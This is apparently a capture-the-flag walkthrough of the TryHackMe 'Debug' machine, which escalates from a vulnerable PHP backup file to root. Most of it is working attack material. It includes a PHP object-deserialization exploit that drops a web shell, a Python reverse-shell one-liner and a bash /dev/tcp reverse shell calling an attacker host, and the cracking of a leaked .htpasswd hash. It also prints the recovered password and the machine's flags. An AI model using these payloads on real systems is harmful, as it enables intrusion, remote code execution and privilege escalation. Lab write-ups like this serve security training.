Debug (PHP Deserialization, motd)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  cat nmap.log 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-25 14:01 +0630
Nmap scan report for 10.10.75.117
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp    open     http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1038/tcp  filtered mtqp
1095/tcp  filtered nicelink
1165/tcp  filtered qsm-gui
5811/tcp  filtered unknown
7920/tcp  filtered unknown
9575/tcp  filtered unknown
27356/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 587.40 seconds

Port 80

HTTP port is open. You will see default apache page at http://10.10.75.117/. Let's dig deeper using gobuster.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  gobuster -u http://10.10.75.117/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

/javascript (Status: 301)
/backup (Status: 301)
/grid (Status: 301)

In http://10.10.75.117/backup directory, we will see index.php.bak. Here is vulnerable source.

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

public function SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

	$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();


?>

We can create exploit.php based on index.php.bak.

<?php

class FormSubmit {

	public $form_file = 'shell.php';
	public $message = '<?php system("whoami"); ?>';

}

echo urlencode(serialize(new FormSubmit));
?>

Puts this serialized string into the urlencode function.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  php -q exploit.php
O%3A10%3A%22FormSubmit%22%3A2%3A%7Bs%3A9%3A%22form_file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A7%3A%22message%22%3Bs%3A26%3A%22%3C%3Fphp+system%28%22whoami%22%29%3B+%3F%3E%22%3B%7D

The complete url will be http://10.10.75.117/index.php?debug=O%3A10%3A%22FormSubmit%22%3A2%3A%7Bs%3A9%3A%22form_file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A7%3A%22message%22%3Bs%3A26%3A%22%3C%3Fphp+system%28%22whoami%22%29%3B+%3F%3E%22%3B%7D. View the result at http://10.10.75.117/shell.php.

Let's create a reverse shell.

<?php

class FormSubmit {

	public $form_file = 'shell.php';
	public $message = '<?php system($_GET["cmd"]); ?>';

}

echo urlencode(serialize(new FormSubmit));
?>

Let's callback url with http://10.10.75.117/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.63",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'. And catch the reverse shell using netcat.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.75.117 55028
$ 

User

Here is .htpasswd for james user.

$ cat .htpasswd
cat .htpasswd
james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1

Let's crack it using hashcat.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz, 2048/5579 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=1600 -D _unroll'
* Device #1: Kernel m01600-pure.207adefd.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1:jamaica    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1
Time.Started.....: Mon Apr 25 19:59:35 2022 (1 sec)
Time.Estimated...: Mon Apr 25 19:59:36 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1041 H/s (8.05ms) @ Accel:256 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1024/14344384 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: 123456 -> bethany

Started: Mon Apr 25 19:59:10 2022
Stopped: Mon Apr 25 19:59:37 2022

Let's connect to james user using password jamaica with ssh.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  ssh james@10.10.75.117
The authenticity of host '10.10.75.117 (10.10.75.117)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.75.117' (ECDSA) to the list of known hosts.
james@10.10.75.117's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ 

Read the user flag.

james@osboxes:~$ cat user.txt 
7e37c84a66cc40b1c6bf700d08d28c20
james@osboxes:~$ 

Root

Here is a note to james user.

james@osboxes:~$ cat Note-To-James.txt 
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root
james@osboxes:~$ 

List the motd file location.

james@osboxes:~$ ls -al /etc/update-motd.d
total 44
drwxr-xr-x   2 root root   4096 Mar 10  2021 .
drwxr-xr-x 134 root root  12288 Mar 10  2021 ..
-rwxrwxr-x   1 root james  1220 Mar 10  2021 00-header
-rwxrwxr-x   1 root james     0 Mar 10  2021 00-header.save
-rwxrwxr-x   1 root james  1157 Jun 14  2016 10-help-text
-rwxrwxr-x   1 root james    97 Dec  7  2018 90-updates-available
-rwxrwxr-x   1 root james   299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x   1 root james   142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x   1 root james   144 Dec  7  2018 98-reboot-required
-rwxrwxr-x   1 root james   604 Nov  5  2017 99-esm

It can be the hint for rooting. We can modify header file to get root access.

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.63/9002 0>&1'" >> /etc/update-motd.d/00-header

And login back again. In netcat session, we got a reverse shell.

╭─hnl@hnl ~  
╰─➤  nc -nlvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.75.117 42310
bash: cannot set terminal process group (1986): Inappropriate ioctl for device
bash: no job control in this shell
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
3c8c3d0fe758c320d158e32f68fabf4b
root@osboxes:/#